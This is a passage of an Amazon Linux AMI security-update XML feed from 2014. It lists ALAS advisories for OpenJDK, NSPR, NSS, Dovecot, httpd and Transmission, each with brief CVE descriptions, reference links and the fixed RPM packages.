Multiple flaws were discovered in the JMX, Libraries, Security, and Serviceability components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions.
CVE-2014-2490:
A format string flaw was discovered in the Hotspot component event logger in OpenJDK. An untrusted Java application or applet could use this flaw to crash the Java Virtual Machine or, potentially, execute arbitrary code with the privileges of the Java Virtual Machine.
CVE-2014-2483:
Multiple improper permission check issues were discovered in the Libraries component in OpenJDK. An untrusted Java application or applet could use these flaws to bypass Java sandbox restrictions.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2483" title="" id="CVE-2014-2483" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2490" title="" id="CVE-2014-2490" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4209" title="" id="CVE-2014-4209" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4216" title="" id="CVE-2014-4216" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4218" title="" id="CVE-2014-4218" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4219" title="" id="CVE-2014-4219" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4221" title="" id="CVE-2014-4221" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4223" title="" id="CVE-2014-4223" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4244" title="" id="CVE-2014-4244" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4252" title="" id="CVE-2014-4252" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4262" title="" id="CVE-2014-4262" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4263" title="" id="CVE-2014-4263" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4266" title="" id="CVE-2014-4266" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2014:0889.html" title="" id="RHSA-2014:0889" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="java-1.7.0-openjdk-javadoc" version="1.7.0.65" release="2.5.1.2.43.amzn1" epoch="1" arch="noarch"><filename>Packages/java-1.7.0-openjdk-javadoc-1.7.0.65-2.5.1.2.43.amzn1.noarch.rpm</filename></package><package name="java-1.7.0-openjdk-src" version="1.7.0.65" release="2.5.1.2.43.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-src-1.7.0.65-2.5.1.2.43.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-debuginfo" version="1.7.0.65" release="2.5.1.2.43.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-debuginfo-1.7.0.65-2.5.1.2.43.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk" version="1.7.0.65" release="2.5.1.2.43.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-1.7.0.65-2.5.1.2.43.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-demo" version="1.7.0.65" release="2.5.1.2.43.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-demo-1.7.0.65-2.5.1.2.43.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-devel" version="1.7.0.65" release="2.5.1.2.43.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-devel-1.7.0.65-2.5.1.2.43.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-devel" version="1.7.0.65" release="2.5.1.2.43.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-devel-1.7.0.65-2.5.1.2.43.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk-demo" version="1.7.0.65" release="2.5.1.2.43.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-demo-1.7.0.65-2.5.1.2.43.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk" version="1.7.0.65" release="2.5.1.2.43.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-1.7.0.65-2.5.1.2.43.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk-src" version="1.7.0.65" release="2.5.1.2.43.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-src-1.7.0.65-2.5.1.2.43.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk-debuginfo" version="1.7.0.65" release="2.5.1.2.43.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-debuginfo-1.7.0.65-2.5.1.2.43.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-384</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-384: critical priority package update for nspr</title><issued date="2014-07-23 14:07:00" /><updated date="2014-09-19 11:38:00" /><severity>critical</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-1545:
Mozilla Netscape Portable Runtime (NSPR) before 4.10.6 allows remote attackers to execute arbitrary code or cause a denial of service (out-of-bounds write) via vectors involving the sprintf and console functions.
1107432:
CVE-2014-1545 Mozilla: Out of bounds write in NSPR (MFSA 2014-55)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1545" title="" id="CVE-2014-1545" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="nspr" version="4.10.4" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/nspr-4.10.4-1.22.amzn1.x86_64.rpm</filename></package><package name="nspr-debuginfo" version="4.10.4" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/nspr-debuginfo-4.10.4-1.22.amzn1.x86_64.rpm</filename></package><package name="nspr-devel" version="4.10.4" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/nspr-devel-4.10.4-1.22.amzn1.x86_64.rpm</filename></package><package name="nspr-debuginfo" version="4.10.4" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/nspr-debuginfo-4.10.4-1.22.amzn1.i686.rpm</filename></package><package name="nspr" version="4.10.4" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/nspr-4.10.4-1.22.amzn1.i686.rpm</filename></package><package name="nspr-devel" version="4.10.4" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/nspr-devel-4.10.4-1.22.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-385</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-385: critical priority package update for nss</title><issued date="2014-07-23 14:08:00" /><updated date="2014-09-19 11:38:00" /><severity>critical</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-1544:
Use-after-free vulnerability in the CERT_DestroyCertificate function in libnss3.so in Mozilla Network Security Services (NSS) 3.x, as used in Firefox before 31.0, Firefox ESR 24.x before 24.7, and Thunderbird before 24.7, allows remote attackers to execute arbitrary code via vectors that trigger certain improper removal of an NSSCertificate structure from a trust domain.
1116198:
CVE-2014-1544 nss: Race-condition in certificate verification can lead to Remote code execution (MFSA 2014-63)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1544" title="" id="CVE-2014-1544" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="nss-tools" version="3.16.0" release="1.36.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-tools-3.16.0-1.36.amzn1.x86_64.rpm</filename></package><package name="nss-debuginfo" version="3.16.0" release="1.36.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-debuginfo-3.16.0-1.36.amzn1.x86_64.rpm</filename></package><package name="nss-sysinit" version="3.16.0" release="1.36.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-sysinit-3.16.0-1.36.amzn1.x86_64.rpm</filename></package><package name="nss-pkcs11-devel" version="3.16.0" release="1.36.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-pkcs11-devel-3.16.0-1.36.amzn1.x86_64.rpm</filename></package><package name="nss" version="3.16.0" release="1.36.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-3.16.0-1.36.amzn1.x86_64.rpm</filename></package><package name="nss-devel" version="3.16.0" release="1.36.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-devel-3.16.0-1.36.amzn1.x86_64.rpm</filename></package><package name="nss-tools" version="3.16.0" release="1.36.amzn1" epoch="0" arch="i686"><filename>Packages/nss-tools-3.16.0-1.36.amzn1.i686.rpm</filename></package><package name="nss-devel" version="3.16.0" release="1.36.amzn1" epoch="0" arch="i686"><filename>Packages/nss-devel-3.16.0-1.36.amzn1.i686.rpm</filename></package><package name="nss-sysinit" version="3.16.0" release="1.36.amzn1" epoch="0" arch="i686"><filename>Packages/nss-sysinit-3.16.0-1.36.amzn1.i686.rpm</filename></package><package name="nss-debuginfo" version="3.16.0" release="1.36.amzn1" epoch="0" arch="i686"><filename>Packages/nss-debuginfo-3.16.0-1.36.amzn1.i686.rpm</filename></package><package name="nss" version="3.16.0" release="1.36.amzn1" epoch="0" arch="i686"><filename>Packages/nss-3.16.0-1.36.amzn1.i686.rpm</filename></package><package name="nss-pkcs11-devel" version="3.16.0" release="1.36.amzn1" epoch="0" arch="i686"><filename>Packages/nss-pkcs11-devel-3.16.0-1.36.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-386</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-386: medium priority package update for dovecot</title><issued date="2014-07-23 14:09:00" /><updated date="2014-09-19 11:39:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-3430:
Dovecot 1.1 before 2.2.13 and dovecot-ee before 2.1.7.7 and 2.2.x before 2.2.12.12 does not properly close old connections, which allows remote attackers to cause a denial of service (resource consumption) via an incomplete SSL/TLS handshake for an IMAP/POP3 connection.
1096402:
CVE-2014-3430 dovecot: denial of service through maxxing out SSL connections
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3430" title="" id="CVE-2014-3430" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="dovecot-debuginfo" version="2.0.9" release="7.14.amzn1" epoch="1" arch="x86_64"><filename>Packages/dovecot-debuginfo-2.0.9-7.14.amzn1.x86_64.rpm</filename></package><package name="dovecot-pigeonhole" version="2.0.9" release="7.14.amzn1" epoch="1" arch="x86_64"><filename>Packages/dovecot-pigeonhole-2.0.9-7.14.amzn1.x86_64.rpm</filename></package><package name="dovecot-devel" version="2.0.9" release="7.14.amzn1" epoch="1" arch="x86_64"><filename>Packages/dovecot-devel-2.0.9-7.14.amzn1.x86_64.rpm</filename></package><package name="dovecot-pgsql" version="2.0.9" release="7.14.amzn1" epoch="1" arch="x86_64"><filename>Packages/dovecot-pgsql-2.0.9-7.14.amzn1.x86_64.rpm</filename></package><package name="dovecot-mysql" version="2.0.9" release="7.14.amzn1" epoch="1" arch="x86_64"><filename>Packages/dovecot-mysql-2.0.9-7.14.amzn1.x86_64.rpm</filename></package><package name="dovecot" version="2.0.9" release="7.14.amzn1" epoch="1" arch="x86_64"><filename>Packages/dovecot-2.0.9-7.14.amzn1.x86_64.rpm</filename></package><package name="dovecot-pigeonhole" version="2.0.9" release="7.14.amzn1" epoch="1" arch="i686"><filename>Packages/dovecot-pigeonhole-2.0.9-7.14.amzn1.i686.rpm</filename></package><package name="dovecot-devel" version="2.0.9" release="7.14.amzn1" epoch="1" arch="i686"><filename>Packages/dovecot-devel-2.0.9-7.14.amzn1.i686.rpm</filename></package><package name="dovecot-debuginfo" version="2.0.9" release="7.14.amzn1" epoch="1" arch="i686"><filename>Packages/dovecot-debuginfo-2.0.9-7.14.amzn1.i686.rpm</filename></package><package name="dovecot" version="2.0.9" release="7.14.amzn1" epoch="1" arch="i686"><filename>Packages/dovecot-2.0.9-7.14.amzn1.i686.rpm</filename></package><package name="dovecot-mysql" version="2.0.9" release="7.14.amzn1" epoch="1" arch="i686"><filename>Packages/dovecot-mysql-2.0.9-7.14.amzn1.i686.rpm</filename></package><package name="dovecot-pgsql" version="2.0.9" release="7.14.amzn1" epoch="1" arch="i686"><filename>Packages/dovecot-pgsql-2.0.9-7.14.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-387</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-387: important priority package update for java-1.6.0-openjdk</title><issued date="2014-07-31 13:52:00" /><updated date="2014-09-19 11:38:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-4266:
Multiple flaws were discovered in the JMX, Libraries, Security, and Serviceability components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions.
CVE-2014-4263:
The Diffie-Hellman (DH) key exchange algorithm implementation in the Security component in OpenJDK failed to validate public DH parameters properly. This could cause OpenJDK to accept and use weak parameters, allowing an attacker to recover the negotiated key.
CVE-2014-4262:
An improper permission check issue was discovered in the Libraries component in OpenJDK. An untrusted Java application or applet could use this flaw to bypass Java sandbox restrictions.
CVE-2014-4252:
Multiple flaws were discovered in the JMX, Libraries, Security, and Serviceability components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions.
CVE-2014-4244:
It was discovered that the RSA algorithm in the Security component in OpenJDK did not sufficiently perform blinding while performing operations that were using private keys. An attacker able to measure timing differences of those operations could possibly leak information about the used keys.
CVE-2014-4219:
It was discovered that the Hotspot component in OpenJDK did not properly verify bytecode from the class files. An untrusted Java application or applet could possibly use these flaws to bypass Java sandbox restrictions.
CVE-2014-4218:
Multiple flaws were discovered in the JMX, Libraries, Security, and Serviceability components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions.
CVE-2014-4216:
It was discovered that the Hotspot component in OpenJDK did not properly verify bytecode from the class files. An untrusted Java application or applet could possibly use these flaws to bypass Java sandbox restrictions.
CVE-2014-4209:
Multiple flaws were discovered in the JMX, Libraries, Security, and Serviceability components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions.
CVE-2014-2490:
A format string flaw was discovered in the Hotspot component event logger in OpenJDK. An untrusted Java application or applet could use this flaw to crash the Java Virtual Machine or, potentially, execute arbitrary code with the privileges of the Java Virtual Machine.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2490" title="" id="CVE-2014-2490" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4209" title="" id="CVE-2014-4209" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4216" title="" id="CVE-2014-4216" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4218" title="" id="CVE-2014-4218" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4219" title="" id="CVE-2014-4219" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4244" title="" id="CVE-2014-4244" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4252" title="" id="CVE-2014-4252" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4262" title="" id="CVE-2014-4262" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4263" title="" id="CVE-2014-4263" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4266" title="" id="CVE-2014-4266" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2014:0907.html" title="" id="RHSA-2014:0907" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="java-1.6.0-openjdk-demo" version="1.6.0.0" release="67.1.13.4.65.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-demo-1.6.0.0-67.1.13.4.65.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-src" version="1.6.0.0" release="67.1.13.4.65.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-src-1.6.0.0-67.1.13.4.65.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk" version="1.6.0.0" release="67.1.13.4.65.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-1.6.0.0-67.1.13.4.65.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-debuginfo" version="1.6.0.0" release="67.1.13.4.65.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-debuginfo-1.6.0.0-67.1.13.4.65.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-javadoc" version="1.6.0.0" release="67.1.13.4.65.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-javadoc-1.6.0.0-67.1.13.4.65.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-devel" version="1.6.0.0" release="67.1.13.4.65.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-devel-1.6.0.0-67.1.13.4.65.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk" version="1.6.0.0" release="67.1.13.4.65.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-1.6.0.0-67.1.13.4.65.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk-demo" version="1.6.0.0" release="67.1.13.4.65.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-demo-1.6.0.0-67.1.13.4.65.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk-debuginfo" version="1.6.0.0" release="67.1.13.4.65.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-debuginfo-1.6.0.0-67.1.13.4.65.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk-devel" version="1.6.0.0" release="67.1.13.4.65.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-devel-1.6.0.0-67.1.13.4.65.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk-javadoc" version="1.6.0.0" release="67.1.13.4.65.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-javadoc-1.6.0.0-67.1.13.4.65.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk-src" version="1.6.0.0" release="67.1.13.4.65.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-src-1.6.0.0-67.1.13.4.65.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-388</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-388: important priority package update for httpd</title><issued date="2014-07-31 13:54:00" /><updated date="2014-09-19 11:39:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-0231:
A denial of service flaw was found in the way httpd's mod_cgid module executed CGI scripts that did not read data from the standard input. A remote attacker could submit a specially crafted request that would cause the httpd child process to hang indefinitely.
CVE-2014-0226:
A race condition flaw, leading to heap-based buffer overflows, was found in the mod_status httpd module. A remote attacker able to access a status page served by mod_status on a server using a threaded Multi-Processing Module (MPM) could send a specially crafted request that would cause the httpd child process to crash or, possibly, allow the attacker to execute arbitrary code with the privileges of the "apache" user.
CVE-2014-0118:
A denial of service flaw was found in the way httpd's mod_deflate module handled request body decompression (configured via the "DEFLATE" input filter). A remote attacker able to send a request whose body would be decompressed could use this flaw to consume an excessive amount of system memory and CPU on the target system.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0118" title="" id="CVE-2014-0118" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0226" title="" id="CVE-2014-0226" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0231" title="" id="CVE-2014-0231" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2014:0920.html" title="" id="RHSA-2014:0920" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="httpd-tools" version="2.2.27" release="1.3.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd-tools-2.2.27-1.3.amzn1.x86_64.rpm</filename></package><package name="httpd-devel" version="2.2.27" release="1.3.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd-devel-2.2.27-1.3.amzn1.x86_64.rpm</filename></package><package name="httpd-manual" version="2.2.27" release="1.3.amzn1" epoch="0" arch="noarch"><filename>Packages/httpd-manual-2.2.27-1.3.amzn1.noarch.rpm</filename></package><package name="mod_ssl" version="2.2.27" release="1.3.amzn1" epoch="1" arch="x86_64"><filename>Packages/mod_ssl-2.2.27-1.3.amzn1.x86_64.rpm</filename></package><package name="httpd" version="2.2.27" release="1.3.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd-2.2.27-1.3.amzn1.x86_64.rpm</filename></package><package name="httpd-debuginfo" version="2.2.27" release="1.3.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd-debuginfo-2.2.27-1.3.amzn1.x86_64.rpm</filename></package><package name="httpd-tools" version="2.2.27" release="1.3.amzn1" epoch="0" arch="i686"><filename>Packages/httpd-tools-2.2.27-1.3.amzn1.i686.rpm</filename></package><package name="httpd-devel" version="2.2.27" release="1.3.amzn1" epoch="0" arch="i686"><filename>Packages/httpd-devel-2.2.27-1.3.amzn1.i686.rpm</filename></package><package name="httpd" version="2.2.27" release="1.3.amzn1" epoch="0" arch="i686"><filename>Packages/httpd-2.2.27-1.3.amzn1.i686.rpm</filename></package><package name="mod_ssl" version="2.2.27" release="1.3.amzn1" epoch="1" arch="i686"><filename>Packages/mod_ssl-2.2.27-1.3.amzn1.i686.rpm</filename></package><package name="httpd-debuginfo" version="2.2.27" release="1.3.amzn1" epoch="0" arch="i686"><filename>Packages/httpd-debuginfo-2.2.27-1.3.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-389</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-389: important priority package update for httpd24</title><issued date="2014-07-31 13:56:00" /><updated date="2014-09-19 11:40:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-0231:
A denial of service flaw was found in the way httpd's mod_cgid module executed CGI scripts that did not read data from the standard input. A remote attacker could submit a specially crafted request that would cause the httpd child process to hang indefinitely.
1120596:
CVE-2014-0231 httpd: mod_cgid denial of service
CVE-2014-0226:
A race condition flaw, leading to heap-based buffer overflows, was found in the mod_status httpd module. A remote attacker able to access a status page served by mod_status on a server using a threaded Multi-Processing Module (MPM) could send a specially crafted request that would cause the httpd child process to crash or, possibly, allow the attacker to execute arbitrary code with the privileges of the "apache" user.
1120603:
CVE-2014-0226 httpd: mod_status heap-based buffer overflow
CVE-2014-0118:
A denial of service flaw was found in the way httpd's mod_deflate module handled request body decompression (configured via the "DEFLATE" input filter). A remote attacker able to send a request whose body would be decompressed could use this flaw to consume an excessive amount of system memory and CPU on the target system.
1120601:
CVE-2014-0118 httpd: mod_deflate denial of service
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0118" title="" id="CVE-2014-0118" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0226" title="" id="CVE-2014-0226" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0231" title="" id="CVE-2014-0231" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="mod24_proxy_html" version="2.4.10" release="1.59.amzn1" epoch="1" arch="x86_64"><filename>Packages/mod24_proxy_html-2.4.10-1.59.amzn1.x86_64.rpm</filename></package><package name="httpd24-tools" version="2.4.10" release="1.59.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd24-tools-2.4.10-1.59.amzn1.x86_64.rpm</filename></package><package name="mod24_ldap" version="2.4.10" release="1.59.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_ldap-2.4.10-1.59.amzn1.x86_64.rpm</filename></package><package name="httpd24" version="2.4.10" release="1.59.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd24-2.4.10-1.59.amzn1.x86_64.rpm</filename></package><package name="httpd24-debuginfo" version="2.4.10" release="1.59.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd24-debuginfo-2.4.10-1.59.amzn1.x86_64.rpm</filename></package><package name="httpd24-devel" version="2.4.10" release="1.59.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd24-devel-2.4.10-1.59.amzn1.x86_64.rpm</filename></package><package name="mod24_session" version="2.4.10" release="1.59.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_session-2.4.10-1.59.amzn1.x86_64.rpm</filename></package><package name="httpd24-manual" version="2.4.10" release="1.59.amzn1" epoch="0" arch="noarch"><filename>Packages/httpd24-manual-2.4.10-1.59.amzn1.noarch.rpm</filename></package><package name="mod24_ssl" version="2.4.10" release="1.59.amzn1" epoch="1" arch="x86_64"><filename>Packages/mod24_ssl-2.4.10-1.59.amzn1.x86_64.rpm</filename></package><package name="mod24_proxy_html" version="2.4.10" release="1.59.amzn1" epoch="1" arch="i686"><filename>Packages/mod24_proxy_html-2.4.10-1.59.amzn1.i686.rpm</filename></package><package name="httpd24" version="2.4.10" release="1.59.amzn1" epoch="0" arch="i686"><filename>Packages/httpd24-2.4.10-1.59.amzn1.i686.rpm</filename></package><package name="httpd24-debuginfo" version="2.4.10" release="1.59.amzn1" epoch="0" arch="i686"><filename>Packages/httpd24-debuginfo-2.4.10-1.59.amzn1.i686.rpm</filename></package><package name="mod24_ldap" version="2.4.10" release="1.59.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_ldap-2.4.10-1.59.amzn1.i686.rpm</filename></package><package name="httpd24-tools" version="2.4.10" release="1.59.amzn1" epoch="0" arch="i686"><filename>Packages/httpd24-tools-2.4.10-1.59.amzn1.i686.rpm</filename></package><package name="mod24_ssl" version="2.4.10" release="1.59.amzn1" epoch="1" arch="i686"><filename>Packages/mod24_ssl-2.4.10-1.59.amzn1.i686.rpm</filename></package><package name="httpd24-devel" version="2.4.10" release="1.59.amzn1" epoch="0" arch="i686"><filename>Packages/httpd24-devel-2.4.10-1.59.amzn1.i686.rpm</filename></package><package name="mod24_session" version="2.4.10" release="1.59.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_session-2.4.10-1.59.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-390</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-390: medium priority package update for transmission</title><issued date="2014-07-31 14:00:00" /><updated date="2014-09-19 11:41:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-4909:
Integer overflow in the tr_bitfieldEnsureNthBitAlloced function in bitfield.c in Transmission before 2.84 allows remote attackers to cause a denial of service and possibly execute arbitrary code via a crafted peer message, which triggers an out-of-bounds write.
1118290:
CVE-2014-4909 transmission: peer communication vulnerability
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4909" title="" id="CVE-2014-4909" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="transmission-common" version="2.84" release="1.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/transmission-common-2.84-1.9.amzn1.x86_64.rpm</filename></package><package name="transmission-daemon" version="2.84" release="1.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/transmission-daemon-2.84-1.9.amzn1.x86_64.rpm</filename></package><package name="transmission" version="2.84" release="1.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/transmission-2.84-1.9.amzn1.x86_64.rpm</filename></package><package name="transmission-debuginfo" version="2.84" release="1.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/transmission-debuginfo-2.84-1.9.amzn1.x86_64.rpm</filename></package><package name="transmission-cli" version="2.84" release="1.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/transmission-cli-2.84-1.9.amzn1.x86_64.rpm</filename></package><package name="transmission-cli" version="2.84" release="1.9.amzn1" epoch="0" arch="i686"><filename>Packages/transmission-cli-2.84-1.9.amzn1.i686.rpm</filename></package><package name="transmission-daemon" version="2.84" release="1.9.amzn1" epoch="0" arch="i686"><filename>Packages/transmission-daemon-2.84-1.9.amzn1.i686.rpm</filename></package><package name="transmission-common" version="2.84" release="1.9.amzn1" epoch="0" arch="i686"><filename>Packages/transmission-common-2.84-1.9.amzn1.i686.rpm</filename></package><package name="transmission-debuginfo" version="2.84" release="1.9.amzn1" epoch="0" arch="i686"><filename>Packages/transmission-debuginfo-2.84-1.9.amzn1.i686.rpm</filename></package><package name="transmission" version="2.84" 